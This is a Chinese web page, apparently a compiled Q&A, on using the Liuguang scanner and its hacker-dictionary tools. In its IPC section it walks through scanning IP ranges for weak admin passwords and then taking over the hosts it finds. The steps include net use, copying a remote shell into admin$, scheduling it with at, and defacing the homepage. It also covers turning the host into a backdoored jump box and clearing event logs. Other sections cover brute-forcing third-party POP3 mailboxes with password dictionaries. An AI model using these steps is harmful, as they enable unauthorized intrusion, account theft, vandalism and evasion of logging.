流光黑客字典工具的使用的简单介绍

导航：

• 1、求流光5.0的使用方法(要浅显易懂)
• 2、流光5的字典怎么做？
• 3、黑客字典怎么用啊？
• 4、请说明流光的适用过程
• 5、流光字典破解怎么用

求流光5.0的使用方法(要浅显易懂)

流光5.0的使用方法

1：流光概述

流光是小容的作品，这款工具可以让一个只会点击鼠标的人成为专业的黑客，这样说一点也不夸张。它可以探测POP3，FTP，HTTP，PROXY，FROM，SQL，SMTP，IPC，等各种漏洞。并针对个中漏洞设计不同的破解方案。

2：流光使用：

步骤1：打开高级扫描向导设置扫描参数

“文件”--}“高级扫描向导”

--}在“起始”/“结束”位置填入，你要扫描的IP段。

--}在“ 目标系统”中选择你要检测的操作系统。

--}在“获取主机名”、“PING检查”前面打勾

--}在“检测项目”中选择“全选”

--}然后单击“下一步”选择“标准端口扫描”

说明：“标准断口”只对常见的断口进行扫描。

“自定义”可以自己定义进行扫描。

--}然后单击“下一步” 设置好所有检测项目后点击“下一步”

--}在选择主机界面选择“本地主机”使用本地主机进任务扫描。

步骤2：单击“开始”扫描过程中要想停止选择“取消”不过要等一段时间。

步骤3：查看扫描报告。扫描结束之后给出“HTLM”格式的报告

方法二：

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它 …

因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了：）

流光的IPC探测：

一、目的和任务：

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程：

1、你得有流光，我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000，否则流光启动会失败！

什么是IPC：

IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。

注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码？当然可以 ！ 不过，是不是太笨了点 …

2、首次启动流光，会看到注册的画面，具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得到弱口令）。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机

4、探测中……

（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样）

有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办么？ ：）有的是 ！自己看看工具－菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。

黑了他 ！

开个dos prompt 执行如下命令，本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 ：） 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass （如果不是用icmd.exe，或者没有设置口令就不用了） ||

7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot，这样:copy default.htm \\ip\c$\interpub\wwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的：（，我们最好是物有所有，作成跳板吧，今后干活方便点：

执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：）

9、还能做成其他的么 ？

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：）

10、日志清除，断开连接 ：

执行我们copy 过去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use \\ip\ipc$ /delete

流光简介

流光4.7)一个绝好的ftp、pop3解密工具，界面豪华，功能强大！功能简介如下：1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测，消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式，可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置，阻塞线程具有自杀功能，不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。

流光4.7新增功能：

1、加入了本地模式，在本机运行是不必安装Sensor。

2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。

3、后台扫描模式时，扫描的结果（*.PTR）可以直接通过附件发送到信箱。

4、Sensor的扫描速度加快。

5、减少了Sensor异常退出的BUG。

6、流光的界面和Sensor之间的通讯采用Triple-DES，密钥的长度最多可到192bits，保证整个传输过程不可监听。扫描的结果也只有在密钥正确的情况下才可阅读。

7、修正的控制服务，新的控制服务在升级Sensor时不再会失败。

8、Sensor的服务名称可以任意指定，控制服务和Sensor的进程名称也可以任意指定。

9、支持XP（本地模式），很快会有98/ME的版本。

我是也是新手这是我找的东西！你自己照着做几遍就会了！记得一定要清理好系统日至！！

流光5的字典怎么做？

流光5的制作我就不知道了,就知道下面的;

流光是一款大名鼎鼎的高级扫描工具,为著名网络安全专家小榕所开发,流光可以探测POP3.上的各种漏洞.它能把一个刚刚会使用鼠标的人塑造为专业级的黑客.最流行的是windows2000/xp用户所能使用的最新版本流光5.0.和window98/me用户的终极最爱流光IV.下面看看如何利用流光软件破解邮件帐号.

启动流光,在左侧列表的POP3处添加破解的POP3地址,这里以破解TOM.COM邮箱为例.对POP3主机点右键"编辑"---"添加",然后填上那个TOM.COM的POP3地址POP.TOM.COM.添加完成后结果如图所示.

下面需要添加我们在进行暴力破解时要用的用户字典.右键点击POP.163.NET.选择"编辑"---"添加"命令添加某个特定的邮箱用户.

添加用户字典完成以后,点击"显示所有项目"便可显示欲破解的用户列表,

POP3地址和用户字典都有了,如果是大量的用户,则点击流光任务栏中的"探测"---"简单模式探测",搜索出弱口令用户,如果是少量的用户,或添加的是单个指定的用户,则可以使用密码字典文件进行破解.在左侧列表中鼠标右击"解码字典或方案",选择"编辑"---"添加"添加一个密码字典文件,然后点击流光任务栏中的"探测"---"标准模式探测"

现在要做的事就是等待结果了,这段时间可以去聊天或看电视,等时间差不多了,回来看看破解结果,

破解结束后,流光软件还会给出一个入侵检测报告,显示本次扫描的结果.扫描出密码的用户会在所有用户列表的前面单独显示出来.点击在列表中显示的已扫描出密码的用户,就会弹出一个"查看密码"的对话框.可以看到密码再次验证成功.

黑客字典怎么用啊？

各类黑客字典的使用大同小异，主要是要设定你的密码的各项指标，如下：包含的字符类型（数字、字母、其他字符),密码长度（6位、7位等），起始密码（就是按照字典排序法设定一个你定的密码，此密码前的密码将不出现，以缩小字典容量），设定完毕后点击生成，如果密码包括字母和数字，而且在6位以上的话，那么出现的字典文件是非常大的。

好的字典软件还有 自动生成特征密码的功能，比如穷举所有年龄段的生日，全国各地所有可能的电话号码、手记号，所有存在的英文单词等。

另外,团IDC网上有许多产品团购,便宜有口碑

请说明流光的适用过程

一、 流光设置 使用流光前首先要对其进行设置，流光会使用向导的方式让用户方便地设置扫描参数。 1、 在流光主界面下，通过选择“文件”-“高级扫描向导”或使用快捷键CTRL+W打开高级扫描向导，在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址，在“目标系统”中选择预检测的操作系统类型，选中“获取主机名”“PING检查”，在“检测项目”中选择“全选”。

2 、 设置好之后，点下一步，然后一步一步分别对“PORTS”“POP3”“FTP”等检测项目进行详细设置，设置完成之后，选择流光自带的用户名字典即密码字典。

3、 将各项设置完成后，然后单击完成按钮，进入“选择主机”界面，这里选择“本地主机”表示使用本机执行扫描任务。 二、 开始扫描 单击开始按钮开始进行扫描就会出现扫描界面，在扫描过程中，如果想停止，通过单击最下角的取消来实现，不过需要相当一段时间才能真正地停止，所以建议一次不要扫太大的网段，如果因扫描时间过长而久等，这时候再想让流光停下来是不容易的。 三、 查看扫描报告 扫描结束之后，流光会自动打开HTML格式的扫描报告，需要指出的是，在扫描完成后，流光不仅把扫描结果整理成报告文件，而且还把可以利用的主机列在流光界面最下方。

单击主机列表中的主机便可以直接对目标主机进行连接操作，除了使用“高级扫描向导”配置高级扫描外，还可以直接选取高级扫描工具，方法是依次单击“探测”菜单中的“高级扫描工具”。

在“高级扫描设置”窗口中可以自定义设置多个选项，这里所介绍的只是流光的一小部分功能，其它一些功能以后慢慢再说吧。流光扫描器自身的设置是比较复杂的，有很多选项可以自由设定，因而也给使用者更大的发挥空间，可以根据网络和机器状况来尝试改变这些设置，提高扫描器的性能，而且流光还有详细的帮助文档。 四、 关于字典文件的说明 流光中有大量的工具供用户生成字典文件，这是由于流光开发最初是设计成为一个纯粹的暴力破解工具，所以字典工具必不可少，单击菜单栏中的工具-字典工具-黑客字典III流光版，就可以启动字典工具。

在黑客字典III流光版中有丰富的选项设置密码中的“字母”“数字”与字符，由于是中文版，用户一看就明白，设置完成后，单击“文件存放位置”标签选择字典保存的名字和位置。

一切设置无误后，单击确定按钮，出现一个预览窗口，从这里可以看到产生的字典形式，确认无误后，按开始按钮字典即可生效。

除了可以按照组合方式产生字典外，还可以按照一定规则产生字典，例如按照中文拼音的规则和英文规定等，依次选择菜单栏中的工具-字典工具-根据拼音规则命令即可进行设置。如果字典文件太大，可以拆分字典。 五、 使用流光的说明 流光一款相当知名的黑客软件，集扫描破解于一身，当扫描出目标主机的用户名时候，然后在参考这些名称配合字典文件进行猜测密码，不过这种猜测是将用户名和密码一个一个进行匹配，验证成功即成功，所以这种方式称为暴力破解。

流光字典破解怎么用

什么东西的用户和密码？基本上都是一样的，用工具——黑客字典生成字典，在流光解码字典或方案中导入你生成的字典，然后就可以开始破解了！

黑防钻石VIP：046569